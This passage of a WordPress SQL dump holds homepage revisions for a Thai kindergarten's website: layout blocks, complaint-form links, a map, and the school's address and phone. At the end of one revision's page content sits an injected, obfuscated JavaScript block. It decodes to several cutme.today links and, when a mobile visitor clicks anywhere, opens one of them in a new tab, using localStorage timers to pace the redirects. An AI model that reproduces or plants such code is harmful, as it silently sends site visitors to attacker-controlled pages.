0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:25:35','2025-06-27 08:25:35','',19,'http://watprato.ssk.in.th/?p=572',0,'revision','',0),
(574,1,'2025-06-27 15:28:03','2025-06-27 08:28:03','','508745932_122233182272202781_2147005512618392889_n','','inherit','open','closed','','508745932_122233182272202781_2147005512618392889_n-2','','','2025-06-27 15:28:03','2025-06-27 08:28:03','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg',0,'attachment','image/jpeg',0),
(575,1,'2025-06-27 15:28:18','2025-06-27 08:28:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image 